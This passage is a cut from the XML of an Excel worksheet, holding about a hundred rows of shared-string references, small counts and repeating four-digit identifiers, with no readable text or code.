    <row r="18708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18708" t="s">
        <v>16231</v>
      </c>
      <c r="B18708" t="s">
        <v>16212</v>
      </c>
      <c r="C18708">
        <v>0</v>
      </c>
      <c r="D18708">
        <v>1842</v>
      </c>
    </row>
    <row r="18709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18709" t="s">
        <v>16228</v>
      </c>
      <c r="B18709" t="s">
        <v>16213</v>
      </c>
      <c r="C18709">
        <v>3</v>
      </c>
      <c r="D18709">
        <v>1842</v>
      </c>
    </row>
    <row r="18710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18710" t="s">
        <v>16231</v>
      </c>
      <c r="B18710" t="s">
        <v>16214</v>
      </c>
      <c r="C18710">
        <v>2</v>
      </c>
      <c r="D18710">
        <v>1842</v>
      </c>
    </row>
    <row r="18711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18711" t="s">
        <v>16228</v>
      </c>
      <c r="B18711" t="s">
        <v>16215</v>
      </c>
      <c r="C18711">
        <v>3</v>
      </c>
      <c r="D18711">
        <v>1842</v>
      </c>
    </row>
    <row r="18712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18712" t="s">
        <v>16231</v>
      </c>
      <c r="B18712" t="s">
        <v>16216</v>
      </c>
      <c r="C18712">
        <v>2</v>
      </c>
      <c r="D18712">
        <v>1842</v>
      </c>
    </row>
    <row r="18713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18713" t="s">
        <v>16228</v>
      </c>
      <c r="B18713" t="s">
        <v>16217</v>
      </c>
      <c r="C18713">
        <v>8</v>
      </c>
      <c r="D18713">
        <v>1842</v>
      </c>
    </row>
    <row r="18714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18714" t="s">
        <v>16231</v>
      </c>
      <c r="B18714" t="s">
        <v>16218</v>
      </c>
      <c r="C18714">
        <v>38</v>
      </c>
      <c r="D18714">
        <v>1842</v>
      </c>
    </row>
    <row r="18715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18715" t="s">
        <v>16229</v>
      </c>
      <c r="B18715" t="s">
        <v>16219</v>
      </c>
      <c r="C18715">
        <v>3</v>
      </c>
      <c r="D18715">
        <v>1842</v>
      </c>
    </row>
    <row r="18716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18716" t="s">
        <v>16230</v>
      </c>
      <c r="B18716" t="s">
        <v>16220</v>
      </c>
      <c r="C18716">
        <v>2</v>
      </c>
      <c r="D18716">
        <v>1842</v>
      </c>
    </row>
    <row r="18717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18717" t="s">
        <v>16229</v>
      </c>
      <c r="B18717" t="s">
        <v>16221</v>
      </c>
      <c r="C18717">
        <v>8</v>
      </c>
      <c r="D18717">
        <v>1842</v>
      </c>
    </row>
    <row r="18718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18718" t="s">
        <v>16230</v>
      </c>
      <c r="B18718" t="s">
        <v>16222</v>
      </c>
      <c r="C18718">
        <v>38</v>
      </c>
      <c r="D18718">
        <v>1842</v>
      </c>
    </row>
    <row r="18719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18719" t="s">
        <v>16223</v>
      </c>
      <c r="B18719" t="s">
        <v>16223</v>
      </c>
      <c r="C18719">
        <v>0</v>
      </c>
      <c r="D18719">
        <v>1842</v>
      </c>
    </row>
    <row r="18720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18720" t="s">
        <v>16224</v>
      </c>
      <c r="B18720" t="s">
        <v>16224</v>
      </c>
      <c r="C18720">
        <v>0</v>
      </c>
      <c r="D18720">
        <v>1842</v>
      </c>
    </row>
    <row r="18721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18721" t="s">
        <v>16228</v>
      </c>
      <c r="B18721" t="s">
        <v>16211</v>
      </c>
      <c r="C18721">
        <v>5</v>
      </c>
      <c r="D18721">
        <v>5572</v>
      </c>
    </row>
    <row r="18722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18722" t="s">
        <v>16231</v>
      </c>
      <c r="B18722" t="s">
        <v>16212</v>
      </c>
      <c r="C18722">
        <v>0</v>
      </c>
      <c r="D18722">
        <v>5572</v>
      </c>
    </row>
    <row r="18723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18723" t="s">
        <v>16228</v>
      </c>
      <c r="B18723" t="s">
        <v>16213</v>
      </c>
      <c r="C18723">
        <v>5</v>
      </c>
      <c r="D18723">
        <v>5572</v>
      </c>
    </row>
    <row r="18724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18724" t="s">
        <v>16231</v>
      </c>
      <c r="B18724" t="s">
        <v>16214</v>
      </c>
      <c r="C18724">
        <v>0</v>
      </c>
      <c r="D18724">
        <v>5572</v>
      </c>
    </row>
    <row r="18725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18725" t="s">
        <v>16228</v>
      </c>
      <c r="B18725" t="s">
        <v>16215</v>
      </c>
      <c r="C18725">
        <v>5</v>
      </c>
      <c r="D18725">
        <v>5572</v>
      </c>
    </row>
    <row r="18726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18726" t="s">
        <v>16231</v>
      </c>
      <c r="B18726" t="s">
        <v>16216</v>
      </c>
      <c r="C18726">
        <v>5</v>
      </c>
      <c r="D18726">
        <v>5572</v>
      </c>
    </row>
    <row r="18727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18727" t="s">
        <v>16228</v>
      </c>
      <c r="B18727" t="s">
        <v>16217</v>
      </c>
      <c r="C18727">
        <v>4</v>
      </c>
      <c r="D18727">
        <v>5572</v>
      </c>
    </row>
    <row r="18728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18728" t="s">
        <v>16231</v>
      </c>
      <c r="B18728" t="s">
        <v>16218</v>
      </c>
      <c r="C18728">
        <v>4</v>
      </c>
      <c r="D18728">
        <v>5572</v>
      </c>
    </row>
    <row r="18729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18729" t="s">
        <v>16229</v>
      </c>
      <c r="B18729" t="s">
        <v>16219</v>
      </c>
      <c r="C18729">
        <v>3</v>
      </c>
      <c r="D18729">
        <v>5572</v>
      </c>
    </row>
    <row r="18730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18730" t="s">
        <v>16230</v>
      </c>
      <c r="B18730" t="s">
        <v>16220</v>
      </c>
      <c r="C18730">
        <v>4</v>
      </c>
      <c r="D18730">
        <v>5572</v>
      </c>
    </row>
    <row r="18731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18731" t="s">
        <v>16229</v>
      </c>
      <c r="B18731" t="s">
        <v>16221</v>
      </c>
      <c r="C18731">
        <v>3</v>
      </c>
      <c r="D18731">
        <v>5572</v>
      </c>
    </row>
    <row r="18732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18732" t="s">
        <v>16230</v>
      </c>
      <c r="B18732" t="s">
        <v>16222</v>
      </c>
      <c r="C18732">
        <v>4</v>
      </c>
      <c r="D18732">
        <v>5572</v>
      </c>
    </row>
    <row r="18733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18733" t="s">
        <v>16223</v>
      </c>
      <c r="B18733" t="s">
        <v>16223</v>
      </c>
      <c r="C18733">
        <v>5</v>
      </c>
      <c r="D18733">
        <v>5572</v>
      </c>
    </row>
    <row r="18734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18734" t="s">
        <v>16224</v>
      </c>
      <c r="B18734" t="s">
        <v>16224</v>
      </c>
      <c r="C18734">
        <v>4</v>
      </c>
      <c r="D18734">
        <v>5572</v>
      </c>
    </row>
    <row r="18735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18735" t="s">
        <v>16228</v>
      </c>
      <c r="B18735" t="s">
        <v>16211</v>
      </c>
      <c r="C18735">
        <v>0</v>
      </c>
      <c r="D18735">
        <v>5314</v>
      </c>
    </row>
    <row r="18736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18736" t="s">
        <v>16231</v>
      </c>
      <c r="B18736" t="s">
        <v>16212</v>
      </c>
      <c r="C18736">
        <v>0</v>
      </c>
      <c r="D18736">
        <v>5314</v>
      </c>
    </row>
    <row r="18737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18737" t="s">
        <v>16228</v>
      </c>
      <c r="B18737" t="s">
        <v>16213</v>
      </c>
      <c r="C18737">
        <v>0</v>
      </c>
      <c r="D18737">
        <v>5314</v>
      </c>
    </row>
    <row r="18738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18738" t="s">
        <v>16231</v>
      </c>
      <c r="B18738" t="s">
        <v>16214</v>
      </c>
      <c r="C18738">
        <v>0</v>
      </c>
      <c r="D18738">
        <v>5314</v>
      </c>
    </row>
    <row r="18739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18739" t="s">
        <v>16228</v>
      </c>
      <c r="B18739" t="s">
        <v>16215</v>
      </c>
      <c r="C18739">
        <v>1</v>
      </c>
      <c r="D18739">
        <v>5314</v>
      </c>
    </row>
    <row r="18740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18740" t="s">
        <v>16231</v>
      </c>
      <c r="B18740" t="s">
        <v>16216</v>
      </c>
      <c r="C18740">
        <v>1</v>
      </c>
      <c r="D18740">
        <v>5314</v>
      </c>
    </row>
    <row r="18741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18741" t="s">
        <v>16228</v>
      </c>
      <c r="B18741" t="s">
        <v>16217</v>
      </c>
      <c r="C18741">
        <v>10</v>
      </c>
      <c r="D18741">
        <v>5314</v>
      </c>
    </row>
    <row r="18742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18742" t="s">
        <v>16231</v>
      </c>
      <c r="B18742" t="s">
        <v>16218</v>
      </c>
      <c r="C18742">
        <v>10</v>
      </c>
      <c r="D18742">
        <v>5314</v>
      </c>
    </row>
    <row r="18743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18743" t="s">
        <v>16229</v>
      </c>
      <c r="B18743" t="s">
        <v>16219</v>
      </c>
      <c r="C18743">
        <v>0</v>
      </c>
      <c r="D18743">
        <v>5314</v>
      </c>
    </row>
    <row r="18744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18744" t="s">
        <v>16230</v>
      </c>
      <c r="B18744" t="s">
        <v>16220</v>
      </c>
      <c r="C18744">
        <v>0</v>
      </c>
      <c r="D18744">
        <v>5314</v>
      </c>
    </row>
    <row r="18745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18745" t="s">
        <v>16229</v>
      </c>
      <c r="B18745" t="s">
        <v>16221</v>
      </c>
      <c r="C18745">
        <v>10</v>
      </c>
      <c r="D18745">
        <v>5314</v>
      </c>
    </row>
    <row r="18746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18746" t="s">
        <v>16230</v>
      </c>
      <c r="B18746" t="s">
        <v>16222</v>
      </c>
      <c r="C18746">
        <v>10</v>
      </c>
      <c r="D18746">
        <v>5314</v>
      </c>
    </row>
    <row r="18747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18747" t="s">
        <v>16223</v>
      </c>
      <c r="B18747" t="s">
        <v>16223</v>
      </c>
      <c r="C18747">
        <v>26</v>
      </c>
      <c r="D18747">
        <v>5314</v>
      </c>
    </row>
    <row r="18748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18748" t="s">
        <v>16224</v>
      </c>
      <c r="B18748" t="s">
        <v>16224</v>
      </c>
      <c r="C18748">
        <v>0</v>
      </c>
      <c r="D18748">
        <v>5314</v>
      </c>
    </row>
    <row r="18749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18749" t="s">
        <v>16228</v>
      </c>
      <c r="B18749" t="s">
        <v>16211</v>
      </c>
      <c r="C18749">
        <v>0</v>
      </c>
      <c r="D18749">
        <v>5570</v>
      </c>
    </row>
    <row r="18750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18750" t="s">
        <v>16231</v>
      </c>
      <c r="B18750" t="s">
        <v>16212</v>
      </c>
      <c r="C18750">
        <v>0</v>
      </c>
      <c r="D18750">
        <v>5570</v>
      </c>
    </row>
    <row r="18751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18751" t="s">
        <v>16228</v>
      </c>
      <c r="B18751" t="s">
        <v>16213</v>
      </c>
      <c r="C18751">
        <v>0</v>
      </c>
      <c r="D18751">
        <v>5570</v>
      </c>
    </row>
    <row r="18752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18752" t="s">
        <v>16231</v>
      </c>
      <c r="B18752" t="s">
        <v>16214</v>
      </c>
      <c r="C18752">
        <v>0</v>
      </c>
      <c r="D18752">
        <v>5570</v>
      </c>
    </row>
    <row r="18753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18753" t="s">
        <v>16228</v>
      </c>
      <c r="B18753" t="s">
        <v>16215</v>
      </c>
      <c r="C18753">
        <v>5</v>
      </c>
      <c r="D18753">
        <v>5570</v>
      </c>
    </row>
    <row r="18754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18754" t="s">
        <v>16231</v>
      </c>
      <c r="B18754" t="s">
        <v>16216</v>
      </c>
      <c r="C18754">
        <v>2</v>
      </c>
      <c r="D18754">
        <v>5570</v>
      </c>
    </row>
    <row r="18755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18755" t="s">
        <v>16228</v>
      </c>
      <c r="B18755" t="s">
        <v>16217</v>
      </c>
      <c r="C18755">
        <v>5</v>
      </c>
      <c r="D18755">
        <v>5570</v>
      </c>
    </row>
    <row r="18756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18756" t="s">
        <v>16231</v>
      </c>
      <c r="B18756" t="s">
        <v>16218</v>
      </c>
      <c r="C18756">
        <v>3</v>
      </c>
      <c r="D18756">
        <v>5570</v>
      </c>
    </row>
    <row r="18757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18757" t="s">
        <v>16229</v>
      </c>
      <c r="B18757" t="s">
        <v>16219</v>
      </c>
      <c r="C18757">
        <v>0</v>
      </c>
      <c r="D18757">
        <v>5570</v>
      </c>
    </row>
    <row r="18758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18758" t="s">
        <v>16230</v>
      </c>
      <c r="B18758" t="s">
        <v>16220</v>
      </c>
      <c r="C18758">
        <v>0</v>
      </c>
      <c r="D18758">
        <v>5570</v>
      </c>
    </row>
    <row r="18759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18759" t="s">
        <v>16229</v>
      </c>
      <c r="B18759" t="s">
        <v>16221</v>
      </c>
      <c r="C18759">
        <v>0</v>
      </c>
      <c r="D18759">
        <v>5570</v>
      </c>
    </row>
    <row r="18760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18760" t="s">
        <v>16230</v>
      </c>
      <c r="B18760" t="s">
        <v>16222</v>
      </c>
      <c r="C18760">
        <v>0</v>
      </c>
      <c r="D18760">
        <v>5570</v>
      </c>
    </row>
    <row r="18761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18761" t="s">
        <v>16223</v>
      </c>
      <c r="B18761" t="s">
        <v>16223</v>
      </c>
      <c r="C18761">
        <v>6</v>
      </c>
      <c r="D18761">
        <v>5570</v>
      </c>
    </row>
    <row r="18762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18762" t="s">
        <v>16224</v>
      </c>
      <c r="B18762" t="s">
        <v>16224</v>
      </c>
      <c r="C18762">
        <v>1</v>
      </c>
      <c r="D18762">
        <v>5570</v>
      </c>
    </row>
    <row r="18763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18763" t="s">
        <v>16228</v>
      </c>
      <c r="B18763" t="s">
        <v>16211</v>
      </c>
      <c r="C18763">
        <v>0</v>
      </c>
      <c r="D18763">
        <v>5540</v>
      </c>
    </row>
    <row r="18764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18764" t="s">
        <v>16231</v>
      </c>
      <c r="B18764" t="s">
        <v>16212</v>
      </c>
      <c r="C18764">
        <v>0</v>
      </c>
      <c r="D18764">
        <v>5540</v>
      </c>
    </row>
    <row r="18765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18765" t="s">
        <v>16228</v>
      </c>
      <c r="B18765" t="s">
        <v>16213</v>
      </c>
      <c r="C18765">
        <v>0</v>
      </c>
      <c r="D18765">
        <v>5540</v>
      </c>
    </row>
    <row r="18766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18766" t="s">
        <v>16231</v>
      </c>
      <c r="B18766" t="s">
        <v>16214</v>
      </c>
      <c r="C18766">
        <v>0</v>
      </c>
      <c r="D18766">
        <v>5540</v>
      </c>
    </row>
    <row r="18767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18767" t="s">
        <v>16228</v>
      </c>
      <c r="B18767" t="s">
        <v>16215</v>
      </c>
      <c r="C18767">
        <v>10</v>
      </c>
      <c r="D18767">
        <v>5540</v>
      </c>
    </row>
    <row r="18768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18768" t="s">
        <v>16231</v>
      </c>
      <c r="B18768" t="s">
        <v>16216</v>
      </c>
      <c r="C18768">
        <v>0</v>
      </c>
      <c r="D18768">
        <v>5540</v>
      </c>
    </row>
    <row r="18769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18769" t="s">
        <v>16228</v>
      </c>
      <c r="B18769" t="s">
        <v>16217</v>
      </c>
      <c r="C18769">
        <v>30</v>
      </c>
      <c r="D18769">
        <v>5540</v>
      </c>
    </row>
    <row r="18770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18770" t="s">
        <v>16231</v>
      </c>
      <c r="B18770" t="s">
        <v>16218</v>
      </c>
      <c r="C18770">
        <v>0</v>
      </c>
      <c r="D18770">
        <v>5540</v>
      </c>
    </row>
    <row r="18771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18771" t="s">
        <v>16229</v>
      </c>
      <c r="B18771" t="s">
        <v>16219</v>
      </c>
      <c r="C18771">
        <v>0</v>
      </c>
      <c r="D18771">
        <v>5540</v>
      </c>
    </row>
    <row r="18772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18772" t="s">
        <v>16230</v>
      </c>
      <c r="B18772" t="s">
        <v>16220</v>
      </c>
      <c r="C18772">
        <v>0</v>
      </c>
      <c r="D18772">
        <v>5540</v>
      </c>
    </row>
    <row r="18773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18773" t="s">
        <v>16229</v>
      </c>
      <c r="B18773" t="s">
        <v>16221</v>
      </c>
      <c r="C18773">
        <v>0</v>
      </c>
      <c r="D18773">
        <v>5540</v>
      </c>
    </row>
    <row r="18774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18774" t="s">
        <v>16230</v>
      </c>
      <c r="B18774" t="s">
        <v>16222</v>
      </c>
      <c r="C18774">
        <v>0</v>
      </c>
      <c r="D18774">
        <v>5540</v>
      </c>
    </row>
    <row r="18775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18775" t="s">
        <v>16223</v>
      </c>
      <c r="B18775" t="s">
        <v>16223</v>
      </c>
      <c r="C18775">
        <v>0</v>
      </c>
      <c r="D18775">
        <v>5540</v>
      </c>
    </row>
    <row r="18776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18776" t="s">
        <v>16224</v>
      </c>
      <c r="B18776" t="s">
        <v>16224</v>
      </c>
      <c r="C18776">
        <v>0</v>
      </c>
      <c r="D18776">
        <v>5540</v>
      </c>
    </row>
    <row r="18777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18777" t="s">
        <v>16228</v>
      </c>
      <c r="B18777" t="s">
        <v>16211</v>
      </c>
      <c r="C18777">
        <v>0</v>
      </c>
      <c r="D18777">
        <v>5576</v>
      </c>
    </row>
    <row r="18778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18778" t="s">
        <v>16231</v>
      </c>
      <c r="B18778" t="s">
        <v>16212</v>
      </c>
      <c r="C18778">
        <v>0</v>
      </c>
      <c r="D18778">
        <v>5576</v>
      </c>
    </row>
    <row r="18779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18779" t="s">
        <v>16228</v>
      </c>
      <c r="B18779" t="s">
        <v>16213</v>
      </c>
      <c r="C18779">
        <v>0</v>
      </c>
      <c r="D18779">
        <v>5576</v>
      </c>
    </row>
    <row r="18780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18780" t="s">
        <v>16231</v>
      </c>
      <c r="B18780" t="s">
        <v>16214</v>
      </c>
      <c r="C18780">
        <v>0</v>
      </c>
      <c r="D18780">
        <v>5576</v>
      </c>
    </row>
    <row r="18781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18781" t="s">
        <v>16228</v>
      </c>
      <c r="B18781" t="s">
        <v>16215</v>
      </c>
      <c r="C18781">
        <v>1</v>
      </c>
      <c r="D18781">
        <v>5576</v>
      </c>
    </row>
    <row r="18782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18782" t="s">
        <v>16231</v>
      </c>
      <c r="B18782" t="s">
        <v>16216</v>
      </c>
      <c r="C18782">
        <v>0</v>
      </c>
      <c r="D18782">
        <v>5576</v>
      </c>
    </row>
    <row r="18783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18783" t="s">
        <v>16228</v>
      </c>
      <c r="B18783" t="s">
        <v>16217</v>
      </c>
      <c r="C18783">
        <v>2</v>
      </c>
      <c r="D18783">
        <v>5576</v>
      </c>
    </row>
    <row r="18784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18784" t="s">
        <v>16231</v>
      </c>
      <c r="B18784" t="s">
        <v>16218</v>
      </c>
      <c r="C18784">
        <v>13</v>
      </c>
      <c r="D18784">
        <v>5576</v>
      </c>
    </row>
    <row r="18785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18785" t="s">
        <v>16229</v>
      </c>
      <c r="B18785" t="s">
        <v>16219</v>
      </c>
      <c r="C18785">
        <v>0</v>
      </c>
      <c r="D18785">
        <v>5576</v>
      </c>
    </row>
    <row r="18786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18786" t="s">
        <v>16230</v>
      </c>
      <c r="B18786" t="s">
        <v>16220</v>
      </c>
      <c r="C18786">
        <v>0</v>
      </c>
      <c r="D18786">
        <v>5576</v>
      </c>
    </row>
    <row r="18787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18787" t="s">
        <v>16229</v>
      </c>
      <c r="B18787" t="s">
        <v>16221</v>
      </c>
      <c r="C18787">
        <v>0</v>
      </c>
      <c r="D18787">
        <v>5576</v>
      </c>
    </row>
    <row r="18788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18788" t="s">
        <v>16230</v>
      </c>
      <c r="B18788" t="s">
        <v>16222</v>
      </c>
      <c r="C18788">
        <v>0</v>
      </c>
      <c r="D18788">
        <v>5576</v>
      </c>
    </row>
    <row r="18789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18789" t="s">
        <v>16223</v>
      </c>
      <c r="B18789" t="s">
        <v>16223</v>
      </c>
      <c r="C18789">
        <v>30</v>
      </c>
      <c r="D18789">
        <v>5576</v>
      </c>
    </row>
    <row r="18790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18790" t="s">
        <v>16224</v>
      </c>
      <c r="B18790" t="s">
        <v>16224</v>
      </c>
      <c r="C18790">
        <v>1</v>
      </c>
      <c r="D18790">
        <v>5576</v>
      </c>
    </row>
    <row r="18791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18791" t="s">
        <v>16228</v>
      </c>
      <c r="B18791" t="s">
        <v>16215</v>
      </c>
      <c r="C18791">
        <v>2</v>
      </c>
      <c r="D18791">
        <v>5314</v>
      </c>
    </row>
    <row r="18792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18792" t="s">
        <v>16231</v>
      </c>
      <c r="B18792" t="s">
        <v>16216</v>
      </c>
      <c r="C18792">
        <v>2</v>
      </c>
      <c r="D18792">
        <v>5314</v>
      </c>
    </row>
    <row r="18793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18793" t="s">
        <v>16228</v>
      </c>
      <c r="B18793" t="s">
        <v>16217</v>
      </c>
      <c r="C18793">
        <v>3</v>
      </c>
      <c r="D18793">
        <v>5314</v>
      </c>
    </row>
    <row r="18794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18794" t="s">
        <v>16231</v>
      </c>
      <c r="B18794" t="s">
        <v>16218</v>
      </c>
      <c r="C18794">
        <v>3</v>
      </c>
      <c r="D18794">
        <v>5314</v>
      </c>
    </row>
    <row r="18795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18795" t="s">
        <v>16229</v>
      </c>
      <c r="B18795" t="s">
        <v>16221</v>
      </c>
      <c r="C18795">
        <v>20</v>
      </c>
      <c r="D18795">
        <v>5314</v>
      </c>
    </row>
    <row r="18796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18796" t="s">
        <v>16230</v>
      </c>
      <c r="B18796" t="s">
        <v>16222</v>
      </c>
      <c r="C18796">
        <v>20</v>
      </c>
      <c r="D18796">
        <v>5314</v>
      </c>
    </row>
    <row r="18797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18797" t="s">
        <v>16228</v>
      </c>
      <c r="B18797" t="s">
        <v>16211</v>
      </c>
      <c r="C18797">
        <v>0</v>
      </c>
      <c r="D18797">
        <v>5577</v>
      </c>
    </row>
    <row r="18798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18798" t="s">
        <v>16231</v>
      </c>
      <c r="B18798" t="s">
        <v>16212</v>
      </c>
      <c r="C18798">
        <v>0</v>
      </c>
      <c r="D18798">
        <v>5577</v>
      </c>
    </row>
    <row r="18799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18799" t="s">
        <v>16228</v>
      </c>
      <c r="B18799" t="s">
        <v>16213</v>
      </c>
      <c r="C18799">
        <v>0</v>
      </c>
      <c r="D18799">
        <v>5577</v>
      </c>
    </row>
    <row r="18800" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18800" t="s">
        <v>16231</v>
      </c>
      <c r="B18800" t="s">
        <v>16214</v>
      </c>
      <c r="C18800">
        <v>0</v>
      </c>
      <c r="D18800">
        <v>5577</v>
      </c>
    </row>
    <row r="18801" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18801" t="s">
        <v>16228</v>
      </c>
      <c r="B18801" t="s">
        <v>16215</v>
      </c>
      <c r="C18801">
        <v>0</v>
      </c>
      <c r="D18801">
        <v>5577</v>
      </c>
    </row>
    <row r="18802" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18802" t="s">
        <v>16231</v>
      </c>
      <c r="B18802" t="s">
        <v>16216</v>
      </c>
      <c r="C18802">
        <v>1</v>
      </c>
      <c r="D18802">
        <v>5577</v>
      </c>
    </row>
    <row r="18803" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18803" t="s">
        <v>16228</v>
      </c>
      <c r="B18803" t="s">
        <v>16217</v>
      </c>
      <c r="C18803">
        <v>2</v>
      </c>
      <c r="D18803">
        <v>5577</v>
      </c>
    </row>
    <row r="18804" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18804" t="s">
        <v>16231</v>
      </c>
      <c r="B18804" t="s">
        <v>16218</v>
      </c>
      <c r="C18804">
        <v>3</v>
      </c>
      <c r="D18804">
        <v>5577</v>
      </c>
    </row>
    <row r="18805" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18805" t="s">
        <v>16229</v>
      </c>
      <c r="B18805" t="s">
        <v>16219</v>
      </c>
      <c r="C18805">
        <v>0</v>
      </c>
      <c r="D18805">
        <v>5577</v>
      </c>
    </row>
    <row r="18806" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18806" t="s">
        <v>16230</v>
      </c>
      <c r="B18806" t="s">
        <v>16220</v>
      </c>
      <c r="C18806">
        <v>0</v>
      </c>
      <c r="D18806">
        <v>5577</v>
      </c>
    </row>
    <row r="18807" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18807" t="s">
        <v>16229</v>
      </c>
      <c r="B18807" t="s">
        <v>16221</v>
      </c>
      <c r="C18807">
        <v>0</v>
      </c>
      <c r="D18807">
        <v>5577</v>
      </c>
    </row>
    <row r="18808" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18808" t="s">
        <v>16230</v>
      </c>
      <c r="B18808" t="s">
        <v>16222</v>
      </c>
      <c r="C18808">
        <v>1</v>
      </c>
      <c r="D18808">
        <v>5577</v>
      </c>
    </row>
    <row r="18809" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18809" t="s">
        <v>16223</v>
      </c>
      <c r="B18809" t="s">
        <v>16223</v>
      </c>
      <c r="C18809">
        <v>20</v>
      </c>
      <c r="D18809">
        <v>5577</v>
      </c>
    </row>
    <row r="18810" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18810" t="s">
        <v>16224</v>
      </c>
      <c r="B18810" t="s">
        <v>16224</v>
      </c>
      <c r="C18810">
        <v>1</v>
      </c>
      <c r="D18810">
        <v>5577</v>
      </c>
    </row>
    <row r="18811" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18811" t="s">
        <v>16228</v>
      </c>
      <c r="B18811" t="s">
        <v>16211</v>
      </c>
      <c r="C18811">
        <v>1</v>
      </c>
      <c r="D18811">
        <v>5554</v>
      </c>
    </row>
    <row r="18812" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18812" t="s">
        <v>16231</v>
      </c>
      <c r="B18812" t="s">
        <v>16212</v>
      </c>
      <c r="C18812">
        <v>1</v>
      </c>
      <c r="D18812">
